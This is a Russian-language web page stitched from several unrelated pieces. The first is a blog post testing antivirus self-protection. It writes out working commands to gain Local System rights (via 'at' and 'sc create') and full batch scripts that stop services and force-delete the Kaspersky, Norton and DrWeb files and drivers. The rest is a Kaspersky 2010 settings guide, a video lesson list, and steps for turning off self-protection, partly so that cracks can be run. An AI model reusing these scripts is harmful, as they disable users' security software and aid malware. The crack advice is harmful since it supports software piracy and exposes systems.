Привет всем!
Недавно мы уже обсудили могущество эвристических технологий современных антивирусов и пришли к мнению, что верить никому нельзя. Даже иногда себе:)
Сегодня мы поговорим о другом спорном моменте антивирусов - самозащите. Некоторые вендоры очень серьёзно относятся к этому моменту, и их продукты выстаивают даже в сложных комплексных случаях активного заражения, эффективно снимая вирусные перехваты, устанавливаясь в систему и даже в последующем удаляя уже изрядно прописавшихся зловредов. Другие считают, что активное заражение - это битва с ветряными мельницами, не приводящая ни к чему путному, а потому - LiveCD, а в ряде случаев и format c:
Отдадим должное обоим оппонентам: безусловно, если есть возможность победить вирусное противостояние - это хорошо. Если только это не приводит к бсодам и загрузке системы на пару-тройку дней. И абсолютно очевидно, что при серьёзном и комплексном заражении зачастую невозможно пробиться через активную массу перехватов, вредоносных процессов на уровне ядра и прочего - а потому часто действительно разумнее провести лечение неактивной системы (с LiveCD или сканируя винчестер на незаражённой машине), ну а в случае разношёрстной файловой инфекции - и задуматься о полной переустановке ОС.
Но не будем предаваться спорам - оставим это для следующей статьи:) Поговорим о простом: о самозащите системы даже на заведомо незаражённой системе. И примем априори:
1) имеется комплексный продукт антивирус+хипс+файервол;
2) система была незаражена, но каким-то образом проник вредоносный код;
3) вредоносный код имеет своим намерением удалить антивирус или повредить его настолько, чтобы обеспечить полную неработоспособность.
Вариант действий будет самым простым - попытка удаления жизненно важных файлов антивируса с правами Local System. Идея такого подхода принадлежит моему хорошему другу Алексею Баранову, который сообщил о ней в закрытых кругах некоторое время назад. Время прошло, будем считать, что вендоры подтянулись - проверим это.
На Windows-системах, работая под администратором (а это, наверное, 80% всех систем) получить права Local System достаточно просто. В голову сразу приходит два способа, хорошо описанные в сети.
Способ 1. Использование планировщика.
По умолчанию, на всех Windows-системах работает служба планировщика задач. Эта служба запускает задачи с искомыми правами Local System. Тогда очень просто добавить задание как-то:
at 11:05 c:\killer.bat
и kill.bat запустится с правами Local System.
Преимущества очевидны: всё просто и ясно. Недостаток: пользователь может заметить странную новую задачу в планировщике, да и просто в целях безопасности отключить эту службу.
Способ 1. Создание службы.
Суть метода заключается в создании службы, её запуске и удалении. При этом всё реализуется в три строчки:
sc create CmdAsSystem type= own type= interact binPath= "cmd /c start /low /b cmd /c (c:\killer.bat)"
net start CmdAsSystem
sc delete CmdAsSystem
При этом мало того, что killer.bat
запустится с приоритетом IDLE, он ещё и будет запущен от имени Local System.
Метод незаметен, никак не проявляет себя.
На момент публикования статьи KIS 2010 оба метода пропускал на уровне хипса, даже не запрашивая никаких разрешений.
Ну а теперь перейдём к самому killer.bat (в нашем случае он расположен в корне на диске С, но понятно, что закинуть его можно куда угодно).
Суть этого файла проста: удаляем всё, что принадлежит антивирусу. Так, для Касперского 2010 это будет:
net stop srservice
erase /F /S /Q "C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2010"
erase /F /S /Q "%windir%\system32\drivers\kl1.sys"
erase /F /S /Q "%windir%\system32\drivers\klif.sys"
erase /F /S /Q "%windir%\system32\drivers\klbg.sys"
erase /F /S /Q "%windir%\system32\drivers\klim5.sys"
erase /F /S /Q "%windir%\system32\drivers\klmd.sys"
erase /F /S /Q "%windir%\system32\drivers\klmouflt.sys"
Для Symantec что-то типа (кто знает точнее - поправьте, сам-то я на Касперском):
net stop srservice
erase /F /S /Q "C:\Program Files\Symantec"
erase /F /S /Q "C:\Program Files\Norton Internet Security"
shutdown -r -f -c "Bye-Bye!!!"
Для Доктора Веба:
net stop srservice
erase /F /S /Q "C:\Program Files\DrWeb"
erase /F /S /Q "%windir%\system32\drivers\dwprot.sys"
erase /F /S /Q "%windir%\system32\drivers\drwebaf.sys"
erase /F /S /Q "%windir%\system32\drivers\DrWebPF.sys"
erase /F /S /Q "%windir%\system32\drivers\spiderg3.sys"
shutdown -r -f -c "Bye-Bye!!!"
Понятно, что аналогичный скрипт можно прописать для всех антивирусов - суть изменять пути к жизненно важным файлам.
Итого - что же мы имеем?
1. KIS 2010 получил такой урон, что был убит, и система осталась без защиты. KIS 2011 лишён этой половой слабости - но он же всё ещё бета…
2. NIS потерял несколько файлов, но работоспособность не нарушилась, файлы впоследствии были скачаны и восстановлены при обновлении из Интернет.
3. DrWeb вообще не пострадал, что и ожидалось, принимая во внимание особый упор разработчика на противостояние инфекции. Но не забываем, что для Веба есть SpiDie …
При этом хипсы указанных продуктов спокойно пропустили оба варианта манипуляций (КИС проверил лично).
ВЫВОДЫ
К сожалению, приходится констатировать факт, что некоторые из существующих антивирусных решений имеют ряд уязвимостей, которые могут быть использованы для повреждения защиты и фактически удалению антивируса с компьютера.
Предлагается в комментариях дополнить наблюдения и исследования по другим антивирусным продуктам (желательно с хипс, чтобы оценить и уровень блокировки действий по получению прав Local System). Думаю, что описанные манипуляции понятны и могут быть легко воспроизведены на виртуальных машинах энтузиастов.
Cheers!
Теги: Добавить метки
Как скопировать настройки и самозащита Касперского 2010
После настройки всех параметров Антивируса Касперского по своему усмотрению, вы можете экспортировать или импортировать их для последующего использования шаблона настроек на других компьютерах, где установлено аналогичное приложение. Например, скопировать настройки антивируса с домашнего компьютера и с помощью созданного шаблона быстро настроить параметры работы приложения на вашем рабочем компьютере или на остальных компьютерах домашней сети.
Все параметры сохраняются в виде особого конфигурационного файла. Для того, чтобы сохранить текущий шаблон настроек антивируса, необходимо провести операцию экспорта заданных параметров работы приложения, выполнив следующую последовательность действий. В главном окне приложения нажмите на кнопку «Настройка », после чего в открывшемся окне в блоке меню слева выберите раздел «Параметры ». В центральной части окна, перейдя в блок «», нажмите на кнопку «Сохранить ». На экране появится окно «Выбор конфигурационного файла », в котором необходимо задать имя сохраняемого файла и папку, в которую он будет помещен. Такому файлу присваивается расширение.cfg (си-эф-джи). Закройте окно нажатием кнопки «Сохранить ».
Для последующего импорта параметров работы антивируса из ранее сохраненного конфигурационного файла в главном окне приложения нажмите на кнопку «Настройка » и в открывшемся окне в блоке меню слева выберите раздел «Параметры ». Перейдя в блок «Управление параметрами программы », нажмите на кнопку «Загрузить ». В появившемся окне найдите сохраненный конфигурационный файл, после чего нажмите на кнопку «Открыть ».
Чтобы обезопасить приложение от проникновения в его системные файлы и настройки различных вирусов, пытающихся помешать его работе, в состав Антивируса Касперского входит специальная функция самозащиты и защиты от удаленного воздействия . При использовании антивируса в Microsoft Windows Vista и 64-разрядных операционных системах эта функция ограничена управлением механизмом самозащиты приложения от изменения или удаления собственных файлов на диске, и записей в системном реестре.
Для включения функции самозащиты антивируса в главном окне приложения нажмите на кнопку «Настройка ». В появившемся окне в блоке меню слева выберите раздел «Параметры ». Перейдя в блок «Самозащита », установите флажок «Включить самозащиту ».
Если же вы хотите заблокировать удаленный доступ к управлению функциями и компонентами антивируса, в блоке «Самозащита » установите флажок «Отключить возможность внешнего управления системной службой ». При этом в случае обнаружения попыток доступа к управлению сервисами антивируса, над значком приложения в области уведомлений панели задач появится соответствующее уведомление.
(0)| Обзор интерфейса и общих настроек | |||||
|---|---|---|---|---|---|
| 1. | Введение. Установка Касперского 2010 | 2:24 | 0 | 5848 | |
| 2. | Обзор контекстного меню программы KAV 2010 | 2:04 | 2 | 1517 | |
| 3. | Основное окно приложения | 3:03 | 0 | 1286 | |
| 4. | Задание общих настроек | 2:21 | 0 | 1427 | |
| 5. | Импорт/Экспорт параметров антивируса и работа с функ... | 3:04 | 0 | 4248 | |
| 6. | Мастер первоначальной настройки антивируса | 2:45 | 0 | 2271 | |
| 7. | Настройка доверенных приложений | 2:35 | 0 | 2734 | |
| 8. | Настройка правил исключений | 2:47 | 0 | 1783 | |
| 9. | Настройка уведомлений | 2:46 | 0 | 1619 | |
| Работа с разделом «Защита» | |||||
| 10. | Обзор подраздела «Файлы и персональные данные» | 2:12 | 0 | 1149 | |
| 11. | Обзор подраздела «Системы и программы» | 2:56 | 0 | 925 | |
| 12. | Работа с разделом «Работа в сети» | 2:14 | 0 | 984 | |
| Работа с подразделом Файловый антивирус | |||||
| 13. | Обзор компонента файлового антивируса | 2:29 | 0 | 1550 | |
| 14. | Задание настроек подраздела «Файловый антивирус» | 2:45 | 0 | 789 | |
| 15. | Дополнительные настройки файлового антивируса | 2:52 | 0 | 885 | |
| 16. | Настройка параметров проверки составных файлов | 3:13 | 0 | 848 | |
| Работа с компонентом «Почтовый антивирус» | |||||
| 17. | Обзор компонента «Почтовый антивирус» | 3:23 | 0 | 838 | |
| 18. | Основные моменты работы почтового антивируса | 3:27 | 0 | 854 | |
| 19. | Задание дополнительных настроек Почтового антивируса | 2:50 | 0 | 766 | |
| Работа с компонентом «Веб-Антивирус» | |||||
| 20. | Обзор компонента «Веб-Антивирус» | 2:15 | 0 | 664 | |
| 21. | Особенности работы компонента «Веб-Антивирус» | 2:24 | 0 | 1064 | |
| 22. | Изменение настроек Веб-антивируса | 2:10 | 0 | 936 | |
| 23. | Настройка параметров области защиты и реакции на обн... | 2:32 | 0 | 743 | |
| 24. | Изменение параметров эвристического анализа и оптими... | 3:04 | 0 | 906 | |
| 25. | Проверка защищенных соединений | 3:10 | 0 | 3180 | |
| Проверка компьютера на вирусы | |||||
| 26. | Описание функции «Проверка на вирусы» | 2:16 | 0 | 1326 | |
| 27. | Настройка основных параметров проверки | 2:56 | 0 | 1323 | |
| 28. | Дополнительные параметры проверки | 2:19 | 0 | 876 | |
| 29. | Запуск проверки и работа с отчетом | 2:24 | 0 | 2271 | |
| 30. | Настройка режима запуска | 2:01 | 0 | 956 | |
| 31. | Настройка оптимизации и общих параметров проверки | 1:42 | 0 | 1392 | |
| 32. | Настройка проверки составных файлов | 1:58 | 0 | 795 | |
| Работа с разделом «Обновление» | |||||
| 33. | Обзор функции «Обновление» | 1:59 | 0 | 2248 | |
| 34. | Основные моменты работы с функцией «Обновление» | 2:47 | 0 | 1170 | |
| 35. | Изменение настроек и запуск процедуры обновления | 3:09 | 0 | 1514 | |
| 36. | 3:18 | 0 | 5101 | ||
2 12 395 0
В определённых ситуациях возникает необходимость отключить Касперского. Скажем, если необходимо открыть определённую страницу, но программа определяет её как потенциально опасную, или зловредную. Также, многие знают, что антивирусы убирают в карантин всевозможные crack’и и программы для взлома лицензий в ПО. В этом случае нет другого выхода, кроме как отключить самозащиту Касперского на время работы с такими утилитами.
Перед тем, как отключить Касперский, учтите, что после этого антивирус становится неактивным, то есть ваша система является абсолютно незащищённой перед всевозможными malware и вирусами. Таким образом, вы наражаете себя на потенциальную опасность.
Вам понадобятся:
Для того, чтобы отключить Касперский версии 2010 года, вам понадобится открыть главное окно антивируса (сделать это можно дважды щёлкнув на ярлык программы на панели задач, воспользовавшись ярлыком на рабочем столе, или отыскав Антивирус Касперского среди установленных программ в меню «Пуск).
После этого в правом верхнем окне ищем кнопку «Настройки». Перед вами появится окно настроек, в левой рабочей области которого будет доступен раздел «Параметры». Заходим в него, и убираем флажок рядом с строкой «Включить самозащиту». Подтверждаем изменения, нажав кнопку «ОК», и закрываем меню настроек. Это проще, чем пользоваться Kaspersky Rescue Disk .
В случае с 2011 версией, процедура будет похожа. Также, как и в прошлом случае, открываем окно настроек (оно находится в том же самом месте). После чего, переходим во вкладку «Самозащита». Смотрим на окно, которое располагается в правой части: там ищем опцию «Включить самозащиту».
Для того, чтобы отключить Касперского 2011снимаем флажок возле этого пункта, и сохраняем изменения при помощи кнопки «ОК». После завершения обязательно включите самозащиту. Если нужно, активируйте программу или продлите пробную версию Касперского .
Предостережения
Как мы уже говори, отключив самозащиту антивируса, вы не сможете проверить компьютер на вирусы и наряжаете его на потенциальную опасность. Так что делайте это только в случае крайней необходимости, и только в том случае, если вы на сто процентов уверенны в том, что ссылка, по которой вы хотите перейти, является абсолютно безопасной; а программа, которую собираетесь запустить или инсталлировать, не нанесёт вреда вашей операционной системе.
Помните, что предотвратить проникновение зловредного программного обеспечение намного легче, чем потом бороться с последствиями их активности.
